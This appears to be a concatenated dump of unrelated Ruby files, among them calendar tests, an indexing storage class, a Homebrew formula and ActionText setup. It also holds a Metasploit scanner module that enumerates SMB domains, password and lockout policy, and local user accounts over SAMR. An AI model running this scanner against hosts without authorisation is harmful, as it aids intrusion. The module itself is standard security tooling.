@divisions << stub("Division2", events: [3, 4, 5])
@divisions << stub("Division3", events: [6, 7])
assert_equal [1, 2, 3, 4, 5, 6, 7], @calendar.events
end
should "handle years with no events" do
@divisions << stub("Division1", events: [1, 2])
@divisions << stub("Division2", events: [])
@divisions << stub("Division3", events: [6, 7])
assert_equal [1, 2, 6, 7], @calendar.events
end
end
context "attribute accessors" do
setup do
@cal = Calendar.new("a-calendar", "title" => "UK bank holidays",
"description" => "UK bank holidays description")
end
should "have an accessor for the title" do
assert_equal "UK bank holidays", @cal.title
end
should "have an accessor for the description" do
assert_equal "UK bank holidays description", @cal.description
end
end
context "show_bunting?" do
setup do
@cal = Calendar.new("a-calendar")
end
should "be true when one division is buntable" do
@div1 = stub("Division", show_bunting?: true)
@div2 = stub("Division", show_bunting?: false)
@div3 = stub("Division", show_bunting?: false)
@cal.stubs(:divisions).returns([@div1, @div2, @div3])
assert @cal.show_bunting?
end
should "be true when more than one division is buntable" do
@div1 = stub("Division", show_bunting?: true)
@div2 = stub("Division", show_bunting?: true)
@div3 = stub("Division", show_bunting?: false)
@cal.stubs(:divisions).returns([@div1, @div2, @div3])
assert @cal.show_bunting?
end
should "be false when no divisions are buntable" do
@div1 = stub("Division", show_bunting?: false)
@div2 = stub("Division", show_bunting?: false)
@div3 = stub("Division", show_bunting?: false)
@cal.stubs(:divisions).returns([@div1, @div2, @div3])
assert_not @cal.show_bunting?
end
end
context "as_json" do
setup do
@div1 = stub("Division", slug: "division-1", as_json: "div1 json")
@div2 = stub("Division", slug: "division-2", as_json: "div2 json")
@cal = Calendar.new("a-calendar")
@cal.stubs(:divisions).returns([@div1, @div2])
end
should "construct a hash representation of all divisions" do
expected = {
"division-1" => "div1 json",
"division-2" => "div2 json",
}
assert_equal expected, @cal.as_json
end
end
end
| 30.60479 | 112 | 0.607122 |
ed225e7b315f33961b6a1d4e4dbb3cca5e30b37d | 5,167 | require 'thread'
require 'tempfile'
module ActsAsIndexed #:nodoc:
class Storage
class OldIndexVersion < Exception;end
INDEX_FILE_EXTENSION = '.ind'
TEMP_FILE_EXTENSION = '.tmp'
def initialize(config)
@path = Pathname.new(config.index_file.to_s)
@size_path = @path.join('size')
@prefix_size = config.index_file_depth
@is_windows_filesystem = config.is_windows_filesystem?
prepare
end
# Takes a hash of atoms and adds these to storage.
def add(atoms, count=1)
operate(:+, atoms)
update_record_count(count)
end
# Takes a hash of atoms and removes these from storage.
def remove(atoms)
operate(:-, atoms)
update_record_count(-1)
end
# Takes a string array of atoms names
# return a hash of the relevant atoms.
def fetch(atom_names, start=false)
atoms = ActiveSupport::OrderedHash.new
atom_names.uniq.collect{|a| encoded_prefix(a) }.uniq.each do |prefix|
pattern = @path.join(prefix.to_s).to_s
pattern += '*' if start
pattern += INDEX_FILE_EXTENSION
Pathname.glob(pattern).each do |atom_file|
atom_file.open do |f|
atoms.merge!(Marshal.load(f))
end
end # Pathname.glob
end # atom_names.uniq
atoms
end # fetch.
# Returns the number of records currently stored in this index.
def record_count
@size_path.read.to_i
# This is a bit horrible.
rescue Errno::ENOENT
0
rescue EOFError
0
end
private
# Takes atoms and adds or removes them from the index depending on the
# passed operation.
def operate(operation, atoms)
# ActiveSupport always available?
atoms_sorted = ActiveSupport::OrderedHash.new
# Sort the atoms into the appropriate shards for writing to individual
# files.
atoms.each do |atom_name, records|
(atoms_sorted[encoded_prefix(atom_name)] ||= ActiveSupport::OrderedHash.new)[atom_name] = records
end
atoms_sorted.each do |e_p, atoms|
path = @path.join(e_p.to_s + INDEX_FILE_EXTENSION)
lock_file(path) do
if path.exist?
from_file = path.open do |f|
Marshal.load(f)
end
else
from_file = ActiveSupport::OrderedHash.new
end
atoms = from_file.merge(atoms){ |k,o,n| o.send(operation, n) }
write_file(path) do |f|
Marshal.dump(atoms,f)
end
end # end lock.
end
end
def update_record_count(delta)
lock_file(@size_path) do
new_count = self.record_count + delta
new_count = 0 if new_count < 0
write_file(@size_path) do |f|
f.write(new_count)
end
end
end
def prepare
version_path = @path.join('version')
if @path.exist?
version_path_to_check = Pathname.new(version_path.to_s)
unless version_path_to_check.exist? && version_path_to_check.read == ActsAsIndexed::INDEX_VERSION
raise OldIndexVersion, "Index was created prior to version #{ActsAsIndexed::INDEX_VERSION}. Please delete it, it will be rebuilt automatically."
end
else
@path.mkpath
# Do we need to lock for this? I don't think so as it is only ever
# creating, not modifying.
write_file(version_path) do |f|
f.write(ActsAsIndexed::INDEX_VERSION)
end
end
end
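    # Map an atom to the shard name used for its index file: the first @prefix_size
    # characters are each encoded and joined with underscores (single-character atoms
    # are encoded directly). Results are memoized in @prefix_cache.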
def encoded_prefix(atom)
prefix = atom[0, @prefix_size]
unless (@prefix_cache ||= ActiveSupport::OrderedHash.new).has_key?(prefix)
if atom.length > 1
@prefix_cache[prefix] = prefix.split(//).map{|c| encode_character(c)}.join('_')
else
@prefix_cache[prefix] = encode_character(atom)
end
end
@prefix_cache[prefix]
end
# Allows compatibility with 1.8.6 which has no ord method.
def encode_character(char)
if @@has_ord ||= char.respond_to?(:ord)
char.ord.to_s
else
char[0]
end
end
def write_file(file_path)
temp_file = Tempfile.new(File.basename(file_path.to_s))
begin
yield temp_file
FileUtils.mv(temp_file.path, file_path.to_s)
ensure
temp_file.close
temp_file.unlink
end
end
@@file_lock = Mutex.new
# Borrowed from Rails' ActiveSupport FileStore. Also under MIT licence.
# Lock a file for a block so only one process or thread can modify it at a time.
def lock_file(file_path, &block) # :nodoc:
@@file_lock.synchronize do
# Windows does not support file locking.
if !windows? && file_path.exist?
file_path.open('r+') do |f|
begin
f.flock File::LOCK_EX
yield
ensure
f.flock File::LOCK_UN
end
end
else
yield
end
end
end
# Checking for windows all the time seems costly.
# Write a separate windows storage class, and use it at runtime?
def windows?
@is_windows_filesystem
end
end
end
| 25.835 | 154 | 0.613702 |
7a8861a5ca917cebf3dc5f83b7ba7e08a2ecaed5 | 541 | module Oauth
class Client < ActiveRecord::Base
before_validation :set_application_id, :set_application_secret
class << self
def authenticate(application_id, application_secret)
        where("application_id = ? AND application_secret = ?", application_id, application_secret)
end
end
private
def set_application_id
self.application_id ||= SecureRandom.urlsafe_base64(16)
end
def set_application_secret
self.application_secret ||= SecureRandom.urlsafe_base64(16)
end
end
end | 25.761905 | 102 | 0.728281 |
d51745a7d42543c268c7f37d9adfb84431588c23 | 352 | def upgrade ta, td, a, d
a["ssl"] = {}
a["ssl"]["certfile"] = ta["ssl"]["certfile"]
a["ssl"]["keyfile"] = ta["ssl"]["keyfile"]
a["ssl"]["generate_certs"] = ta["ssl"]["generate_certs"]
a["ssl"]["insecure"] = ta["ssl"]["insecure"]
return a, d
end
def downgrade ta, td, a, d
a.delete("ssl")
return a, d
end
| 25.142857 | 61 | 0.511364 |
113317e1765b5b88f2796f60fdae39f8cff868f3 | 8,401 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::DCERPC
# Scanner mixin should be near last
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SMB User Enumeration (SAM EnumUsers)',
'Description' => 'Determine what local users exist via the SAM RPC service',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'DCERPC::fake_bind_multi' => false
}
)
deregister_options('RPORT', 'RHOST')
end
def rport
@rport || super
end
def smb_direct
@smbdirect || super
end
# Locate an available SMB PIPE for the specified service
def smb_find_dcerpc_pipe(uuid, vers, pipes)
found_pipe = nil
found_handle = nil
pipes.each do |pipe_name|
connected = false
begin
connect
smb_login
connected = true
handle = dcerpc_handle(
uuid, vers,
'ncacn_np', ["\\#{pipe_name}"]
)
dcerpc_bind(handle)
return pipe_name
rescue ::Interrupt => e
raise e
rescue ::Exception => e
raise e if not connected
end
disconnect
end
nil
end
def smb_pack_sid(str)
[1,5,0].pack('CCv') + str.split('-').map{|x| x.to_i}.pack('NVVVV')
end
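  # Walk the NDR-encoded string array in the EnumDomains response and return the domain names.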
def smb_parse_sam_domains(data)
ret = []
idx = 0
cnt = data[8, 4].unpack("V")[0]
return ret if cnt == 0
idx += 20
idx += 12 * cnt
1.upto(cnt) do
v = data[idx,data.length].unpack('V*')
l = v[2] * 2
while(l % 4 != 0)
l += 1
end
idx += 12
ret << data[idx, v[2] * 2].gsub("\x00", '')
idx += l
end
ret
end
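  # Parse the EnumUsers response into a hash mapping each RID to its account name.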
def smb_parse_sam_users(data)
ret = {}
rid = []
idx = 0
cnt = data[8, 4].unpack("V")[0]
return ret if cnt == 0
idx += 20
1.upto(cnt) do
v = data[idx,12].unpack('V3')
rid << v[0]
idx += 12
end
1.upto(cnt) do
v = data[idx,32].unpack('V*')
l = v[2] * 2
while(l % 4 != 0)
l += 1
end
uid = rid.shift
idx += 12
ret[uid] = data[idx, v[2] * 2].gsub("\x00", '')
idx += l
end
ret
end
@@sam_uuid = '12345778-1234-abcd-ef00-0123456789ac'
@@sam_vers = '1.0'
@@sam_pipes = %W{ SAMR LSARPC NETLOGON BROWSER SRVSVC }
# Fingerprint a single host
def run_host(ip)
[[139, false], [445, true]].each do |info|
@rport = info[0]
@smbdirect = info[1]
sam_pipe = nil
sam_handle = nil
begin
# Find the SAM pipe
sam_pipe = smb_find_dcerpc_pipe(@@sam_uuid, @@sam_vers, @@sam_pipes)
break if not sam_pipe
# Connect4
stub =
NDR.uwstring("\\\\" + ip) +
NDR.long(2) +
NDR.long(0x30)
dcerpc.call(62, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
if ! (resp and resp.length == 24)
          print_error("Invalid response from the Connect4 request")
disconnect
return
end
phandle = resp[0,20]
perror = resp[20,4].unpack("V")[0]
if(perror == 0xc0000022)
disconnect
return
end
if(perror != 0)
          print_error("Received error #{"0x%.8x" % perror} from the Connect4 request")
disconnect
return
end
# EnumDomains
stub = phandle + NDR.long(0) + NDR.long(8192)
dcerpc.call(6, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
domlist = smb_parse_sam_domains(resp)
domains = {}
# LookupDomain
domlist.each do |domain|
next if domain == 'Builtin'
# Round up the name to match NDR.uwstring() behavior
dlen = (domain.length + 1) * 2
# The SAM functions are picky on Windows 2000
stub =
phandle +
[(domain.length + 0) * 2].pack("v") + # NameSize
[(domain.length + 1) * 2].pack("v") + # NameLen (includes null)
NDR.long(rand(0x100000000)) +
[domain.length + 1].pack("V") + # MaxCount (includes null)
NDR.long(0) +
[domain.length + 0].pack("V") + # ActualCount (ignores null)
Rex::Text.to_unicode(domain) # No null appended
dcerpc.call(5, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
raw_sid = resp[12, 20]
txt_sid = raw_sid.unpack("NVVVV").join("-")
domains[domain] = {
:sid_raw => raw_sid,
:sid_txt => txt_sid
}
end
# OpenDomain, QueryDomainInfo, CloseDomain
domains.each_key do |domain|
# Open
stub =
phandle +
NDR.long(0x00000305) +
NDR.long(4) +
[1,4,0].pack('CvC') +
domains[domain][:sid_raw]
dcerpc.call(7, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
dhandle = resp[0,20]
derror = resp[20,4].unpack("V")[0]
# Catch access denied replies to OpenDomain
if(derror != 0)
next
end
# Password information
stub = dhandle + [0x01].pack('v')
dcerpc.call(8, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
if(resp and resp[-4,4].unpack('V')[0] == 0)
mlen,hlen = resp[8,4].unpack('vv')
domains[domain][:pass_min] = mlen
domains[domain][:pass_min_history] = hlen
end
# Server Role
stub = dhandle + [0x07].pack('v')
dcerpc.call(8, stub)
        resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
        if(resp and resp[-4,4].unpack('V')[0] == 0)
domains[domain][:server_role] = resp[8,2].unpack('v')[0]
end
# Lockout Threshold
stub = dhandle + [12].pack('v')
dcerpc.call(8, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
if(resp and resp[-4,4].unpack('V')[0] == 0)
lduration = resp[8,8]
lwindow = resp[16,8]
lthresh = resp[24, 2].unpack('v')[0]
domains[domain][:lockout_threshold] = lthresh
domains[domain][:lockout_duration] = Rex::Proto::SMB::Utils.time_smb_to_unix(*(lduration.unpack('V2')))
domains[domain][:lockout_window] = Rex::Proto::SMB::Utils.time_smb_to_unix(*(lwindow.unpack('V2')))
end
# Users
stub = dhandle + NDR.long(0) + NDR.long(0x10) + NDR.long(1024*1024)
dcerpc.call(13, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
if(resp and resp[-4,4].unpack('V')[0] == 0)
domains[domain][:users] = smb_parse_sam_users(resp)
end
# Close Domain
dcerpc.call(1, dhandle)
end
# Close Policy
dcerpc.call(1, phandle)
domains.each_key do |domain|
# Delete the no longer used raw SID value
domains[domain].delete(:sid_raw)
# Store the domain name itself
domains[domain][:name] = domain
# Store the domain information
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'smb.domain.enumusers',
:data => domains[domain]
)
users = domains[domain][:users] || {}
extra = ""
if (domains[domain][:lockout_threshold])
extra = "( "
extra << "LockoutTries=#{domains[domain][:lockout_threshold]} "
extra << "PasswordMin=#{domains[domain][:pass_min]} "
extra << ")"
end
print_good("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
end
# cleanup
disconnect
return
rescue ::Timeout::Error
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionError
rescue ::Rex::Proto::SMB::Exceptions::LoginError
next
rescue ::Exception => e
print_line("Error: #{ip} #{e.class} #{e}")
end
end
end
end
| 25.077612 | 114 | 0.549577 |
18ae8bc6b99908c494890c9f466cf979e7d04295 | 1,557 | module Fog
module Storage
class GoogleXML
class Real
# Get an expiring object url from Google Storage for putting an object
#
# ==== Parameters
# * bucket_name<~String> - Name of bucket containing object
# * object_name<~String> - Name of object to get expiring url for
# * expires<~Time> - An expiry time for this url
#
# ==== Returns
# * response<~Excon::Response>:
# * body<~String> - url for object
#
def put_object_url(bucket_name, object_name, expires, headers = {})
raise ArgumentError.new("bucket_name is required") unless bucket_name
raise ArgumentError.new("object_name is required") unless object_name
https_url({
:headers => headers,
:host => @host,
:method => "PUT",
:path => "#{bucket_name}/#{object_name}"
}, expires)
end
end
class Mock
def put_object_url(bucket_name, object_name, expires, headers = {})
raise ArgumentError.new("bucket_name is required") unless bucket_name
raise ArgumentError.new("object_name is required") unless object_name
https_url({
:headers => headers,
:host => @host,
:method => "PUT",
:path => "#{bucket_name}/#{object_name}"
}, expires)
end
end
end
end
end
| 36.209302 | 79 | 0.517662 |
394770a45c36b3b8d1e4e8a2b7e4185081671851 | 911 | require 'chefspec'
require 'chefspec/berkshelf'
require 'chefspec/cacher'
require 'coveralls'
Coveralls.wear!
RSpec.configure do |config|
config.color = true
config.alias_example_group_to :describe_recipe, type: :recipe
config.filter_run :focus
config.run_all_when_everything_filtered = true
Kernel.srand config.seed
config.order = :random
if config.files_to_run.one?
config.default_formatter = 'doc'
end
config.expect_with :rspec do |expectations|
expectations.syntax = :expect
end
config.mock_with :rspec do |mocks|
mocks.syntax = :expect
mocks.verify_partial_doubles = true
end
end
at_exit { ChefSpec::Coverage.report! }
RSpec.shared_context 'recipe tests', type: :recipe do
let(:chef_run) { ChefSpec::SoloRunner.new(node_attributes).converge(described_recipe) }
def node_attributes
{
platform: 'ubuntu',
version: '12.04'
}
end
end
| 20.704545 | 89 | 0.732162 |
bf615b1fe50a30d05c6125a1297aff2400174276 | 1,557 | #
# Be sure to run `pod lib lint XYHelpKit.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'XYHelpKit'
s.version = '0.2.0'
s.summary = 'XYHelpKit.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/Gaohc/XYHelpKit.git'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'gaohongcheng' => '[email protected]' }
s.source = { :git => 'https://github.com/Gaohc/XYHelpKit.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'XYHelpKit/**/*'
# s.resource_bundles = {
# 'XYHelpKit' => ['XYHelpKit/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 36.209302 | 99 | 0.631342 |
28300eb548144c2fe6ca64fdfb44089d505cf6be | 353 | cask 'font-miltonian' do
version :latest
sha256 :no_check
# github.com/google/fonts was verified as official when first introduced to the cask
url 'https://github.com/google/fonts/raw/master/ofl/miltonian/Miltonian-Regular.ttf'
name 'Miltonian'
homepage 'https://www.google.com/fonts/specimen/Miltonian'
font 'Miltonian-Regular.ttf'
end
| 29.416667 | 86 | 0.76204 |
1c6fd6b1a2c7e37d0612c0972d4f6a1b88cd3b9d | 5,149 | class GnomeBuilder < Formula
desc "IDE for GNOME"
homepage "https://wiki.gnome.org/Apps/Builder"
url "https://download.gnome.org/sources/gnome-builder/3.28/gnome-builder-3.28.4.tar.xz"
sha256 "05281f01e66fde8fcd89af53709053583cf74d0ae4ac20b37185664f25396b45"
bottle do
sha256 "b2068860adae8eee244a324fba083aa3bfdefef7962c894c320741802f199ad3" => :high_sierra
sha256 "f0f008cab0a9c58973980c8386b9bf76e1305aa8d934d98b5916b861251fc87d" => :sierra
sha256 "4845a2b8a31cd6eeca400f5216aa806a3521f4640ddf6957de89646cc86abe06" => :el_capitan
end
depends_on "gobject-introspection" => :build
depends_on "pkg-config" => :build
depends_on "meson-internal" => :build
depends_on "ninja" => :build
depends_on "python" => :build
depends_on "dbus"
depends_on "gtk+3"
depends_on "libdazzle"
depends_on "gtksourceview3"
depends_on "json-glib"
depends_on "jsonrpc-glib"
depends_on "template-glib"
depends_on "libpeas"
depends_on "vte3"
depends_on "libxml2"
depends_on "libgit2-glib"
depends_on "gspell"
depends_on "hicolor-icon-theme"
depends_on "adwaita-icon-theme"
# fix sandbox violation and remove unavailable linker option
patch :DATA
needs :cxx11
def install
ENV.cxx11
ENV["DESTDIR"] = ""
args = %W[
--prefix=#{prefix}
-Dwith_git=true
-Dwith_autotools=true
-Dwith_history=true
-Dwith_webkit=false
-Dwith_clang=false
-Dwith_devhelp=false
-Dwith_flatpak=false
-Dwith_sysprof=false
-Dwith_vapi=false
-Dwith_vala_pack=false
-Dwith_qemu=false
-Dwith_safe_path=#{HOMEBREW_PREFIX}/bin:/usr/bin:/bin
]
# prevent sandbox violation
pyver = Language::Python.major_minor_version "python3"
inreplace "src/libide/meson.build",
"install_dir: pygobject_override_dir",
"install_dir: '#{lib}/python#{pyver}/site-packages'"
mkdir "build" do
system "meson", *args, ".."
system "ninja"
system "ninja", "install"
end
# meson-internal gives wrong install_names for dylibs due to their unusual installation location
# create softlinks to fix
ln_s Dir.glob("#{lib}/gnome-builder/*dylib"), lib
end
def post_install
system "#{Formula["glib"].opt_bin}/glib-compile-schemas", "#{HOMEBREW_PREFIX}/share/glib-2.0/schemas"
system "#{Formula["gtk+3"].opt_bin}/gtk3-update-icon-cache", "-f", "-t", "#{HOMEBREW_PREFIX}/share/icons/hicolor"
end
test do
assert_match version.to_s, shell_output("#{bin}/gnome-builder --version")
end
end
__END__
diff --git a/src/libide/meson.build b/src/libide/meson.build
index 055801b..4e29f9d 100644
--- a/src/libide/meson.build
+++ b/src/libide/meson.build
@@ -160,37 +160,6 @@ if get_option('with_editorconfig')
]
endif
-# We want to find the subdirectory to install our override into:
-python3 = find_program('python3')
-
-get_overridedir = '''
-import os
-import sysconfig
-
-libdir = sysconfig.get_config_var('LIBDIR')
-if not libdir:
- libdir = '/usr/lib'
-
-try:
- import gi
- overridedir = gi._overridesdir
-except ImportError:
- purelibdir = sysconfig.get_path('purelib')
- overridedir = os.path.join(purelibdir, 'gi', 'overrides')
-
-if overridedir.startswith(libdir): # Should always be True..
- overridedir = overridedir[len(libdir) + 1:]
-
-print(overridedir)
-'''
-
-ret = run_command([python3, '-c', get_overridedir])
-if ret.returncode() != 0
- error('Failed to determine pygobject overridedir')
-else
- pygobject_override_dir = join_paths(get_option('libdir'), ret.stdout().strip())
-endif
-
install_data('Ide.py', install_dir: pygobject_override_dir)
libide_deps = [
diff --git a/src/plugins/meson.build b/src/plugins/meson.build
index d97d7e3..646e7f3 100644
--- a/src/plugins/meson.build
+++ b/src/plugins/meson.build
@@ -5,10 +5,8 @@ gnome_builder_plugins_sources = ['gnome-builder-plugins.c']
gnome_builder_plugins_args = []
gnome_builder_plugins_deps = [libpeas_dep, libide_plugin_dep, libide_dep]
gnome_builder_plugins_link_with = []
-gnome_builder_plugins_link_deps = join_paths(meson.current_source_dir(), 'plugins.map')
-gnome_builder_plugins_link_args = [
- '-Wl,--version-script,' + gnome_builder_plugins_link_deps,
-]
+gnome_builder_plugins_link_deps = []
+gnome_builder_plugins_link_args = []
subdir('autotools')
subdir('autotools-templates')
@@ -76,7 +74,6 @@ gnome_builder_plugins = shared_library(
gnome_builder_plugins_sources,
dependencies: gnome_builder_plugins_deps,
- link_depends: 'plugins.map',
c_args: gnome_builder_plugins_args,
link_args: gnome_builder_plugins_link_args,
link_with: gnome_builder_plugins_link_with,
diff --git a/src/main.c b/src/main.c
index f3bea6d..8f7eab8 100644
--- a/src/main.c
+++ b/src/main.c
@@ -109,6 +109,9 @@ main (int argc,
/* Setup our gdb fork()/exec() helper */
bug_buddy_init ();
+ /* macOS dbus hack */
+ g_setenv("DBUS_SESSION_BUS_ADDRESS", "launchd:env=DBUS_LAUNCHD_SESSION_BUS_SOCKET", TRUE);
+
/*
* We require a desktop session that provides a properly working
* DBus environment. Bail if for some reason that is not the case.
| 30.64881 | 117 | 0.717227 |
bbb2be1995477eb647a42cc513cbe2a887f7de69 | 2,422 | # frozen_string_literal: true
require "rails"
require "action_controller/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_text"
module ActionText
class Engine < Rails::Engine
isolate_namespace ActionText
config.eager_load_namespaces << ActionText
config.action_text = ActiveSupport::OrderedOptions.new
config.action_text.attachment_tag_name = "action-text-attachment"
config.autoload_once_paths = %W(
#{root}/app/helpers
#{root}/app/models
)
initializer "action_text.attribute" do
ActiveSupport.on_load(:active_record) do
include ActionText::Attribute
prepend ActionText::Encryption
end
end
initializer "action_text.asset" do
if Rails.application.config.respond_to?(:assets)
Rails.application.config.assets.precompile += %w( action_text trix )
end
end
initializer "action_text.attachable" do
ActiveSupport.on_load(:active_storage_blob) do
include ActionText::Attachable
def previewable_attachable?
representable?
end
def attachable_plain_text_representation(caption = nil)
"[#{caption || filename}]"
end
def to_trix_content_attachment_partial_path
nil
end
end
end
initializer "action_text.helper" do
%i[action_controller_base action_mailer].each do |abstract_controller|
ActiveSupport.on_load(abstract_controller) do
helper ActionText::Engine.helpers
end
end
end
initializer "action_text.renderer" do
ActiveSupport.on_load(:action_text_content) do
self.default_renderer = Class.new(ActionController::Base).renderer
end
%i[action_controller_base action_mailer].each do |abstract_controller|
ActiveSupport.on_load(abstract_controller) do
around_action do |controller, action|
ActionText::Content.with_renderer(controller, &action)
end
end
end
end
initializer "action_text.system_test_helper" do
ActiveSupport.on_load(:action_dispatch_system_test_case) do
require "action_text/system_test_helper"
include ActionText::SystemTestHelper
end
end
initializer "action_text.configure" do |app|
ActionText::Attachment.tag_name = app.config.action_text.attachment_tag_name
end
end
end
| 27.83908 | 82 | 0.699422 |
7a13067c27e87cb4d3853a1be46dd4d2dab3ebdb | 1,841 | =begin
#Kubernetes
#No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.2.3
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Kubernetes::V1beta1ReplicaSetCondition
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'V1beta1ReplicaSetCondition' do
before do
# run before each test
@instance = Kubernetes::V1beta1ReplicaSetCondition.new
end
after do
# run after each test
end
describe 'test an instance of V1beta1ReplicaSetCondition' do
it 'should create an instance of V1beta1ReplicaSetCondition' do
expect(@instance).to be_instance_of(Kubernetes::V1beta1ReplicaSetCondition)
end
end
describe 'test attribute "last_transition_time"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "message"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "reason"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "status"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "type"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 27.477612 | 103 | 0.73384 |
180259df9c18621ad8da7d590d768adc6cb67a2e | 2,030 | # Representation of a Cartfile.resolved entry.
# @see https://github.com/Carthage/Carthage/blob/master/Documentation/Artifacts.md#origin
class CarthageDependency
class << self
# Parses Cartfile.resolved dependency entry, e.g.
# github "CocoaLumberjack/CocoaLumberjack" "3.2.1"
def parse_cartfile_resolved_line(line)
line.strip!
matches = line.match(/^(\w+)\s+\"([^\"]+)\"(\s+\"([^\"]+)\")$/)
return nil if matches.nil?
if matches.length == 5
CarthageDependency.new(origin: matches[1].to_sym, source: matches[2], version: matches[4])
else
nil
end
end
end
attr_reader :origin, :source, :version
def initialize(args)
raise AppError.new, "Expected Symbol for origin '#{args[:origin]}'" unless args[:origin].kind_of? Symbol
    raise AppError.new, "Unrecognized origin '#{args[:origin]}'" unless [:github, :git, :binary].include?(args[:origin])
@origin = args[:origin]
@source = args[:source]
@version = args[:version]
end
def new_version_file
VersionFile.new(version_filepath)
end
# Since one Cartfile.resolved entry may produce multiple differently named frameworks,
# this is an entry point to identifying a framework name.
def guessed_framework_basename
case @origin
when :github
@source.split("/").last
when :git
filename = @source.split("/").last
filename.chomp(".git")
when :binary
filename = @source.split("/").last
filename.chomp(".json")
else
raise AppError.new, "Unrecognized origin '#{@origin}'"
end
end
def version_filename
".#{guessed_framework_basename}.version"
end
def version_filepath
File.join(CARTHAGE_BUILD_DIR, version_filename)
end
def verify_version_in_version_file(version_file)
if @version != version_file.version
raise OutdatedFrameworkBuildError.new(guessed_framework_basename, version_file.version, @version)
end
end
def to_s
"#{@origin.to_s} \"#{@source}\" \"#{@version}\""
end
end
| 29.42029 | 120 | 0.673892 |
791576f8cc3ef9b980a32b794cc9186233830b5f | 50 | module Cfror
module ApplicationHelper
end
end
| 10 | 26 | 0.8 |
0827fabcf0b42e5ff0feb3e62520980aff6a1132 | 964 | module Spec
module Rubygems
def self.setup
Gem.clear_paths
ENV['BUNDLE_PATH'] = nil
ENV['GEM_HOME'] = ENV['GEM_PATH'] = Path.base_system_gems.to_s
ENV['PATH'] = "#{Path.home}/.bundle/bin:#{Path.system_gem_path}/bin:#{ENV['PATH']}"
unless File.exist?("#{Path.base_system_gems}")
FileUtils.mkdir_p(Path.base_system_gems)
puts "running `gem install builder rake fakeweb --no-rdoc --no-ri`"
`gem install builder rake fakeweb --no-rdoc --no-ri`
end
ENV['HOME'] = Path.home.to_s
Gem::DefaultUserInteraction.ui = Gem::SilentUI.new
end
def gem_command(command, args = "", options = {})
if command == :exec && !options[:no_quote]
args = args.gsub(/(?=")/, "\\")
args = %["#{args}"]
end
lib = File.join(File.dirname(__FILE__), '..', '..', 'lib')
%x{#{Gem.ruby} -I#{lib} -rubygems -S gem --backtrace #{command} #{args}}.strip
end
end
end | 32.133333 | 89 | 0.585062 |
4af4789af60c4d28ea0e2baa49acf552bd55a29b | 394 | module Sass
module Tree
# A dynamic node representing a Sass `@warn` statement.
#
# @see Sass::Tree
class WarnNode < Node
# The expression to print.
# @return [Script::Tree::Node]
attr_accessor :expr
# @param expr [Script::Tree::Node] The expression to print
def initialize(expr)
@expr = expr
super()
end
end
end
end
| 20.736842 | 64 | 0.588832 |
1151c4ee146057cdfc4ce4883c16cf881749eca3 | 523 | require 'middleman-core'
require 'middleman-blog'
require 'week_of_month'
module Middleman
class CalendarExtension < Extension
def initialize(app, options_hash={}, &block)
super
# place in class variable so helpers can access
@@calendar_article = nil
end
helpers do
def calendar(article, blog_name='blog')
@calendar_article = article
@blog_name = blog_name
file = File.join(File.dirname(__FILE__), 'calendar.erb')
ERB.new(File.read(file), 0, '>').result(binding)
end
end
end
end
| 21.791667 | 60 | 0.709369 |
ed1b0f522689264bf03fb2b62d0f343688dc7069 | 3,853 | require "cases/helper"
require "models/post"
require "models/tag"
require "models/author"
require "models/comment"
require "models/category"
require "models/categorization"
require "models/tagging"
module Remembered
extend ActiveSupport::Concern
included do
after_create :remember
protected
def remember; self.class.remembered << self; end
end
module ClassMethods
def remembered; @@remembered ||= []; end
def sample; @@remembered.sample; end
end
end
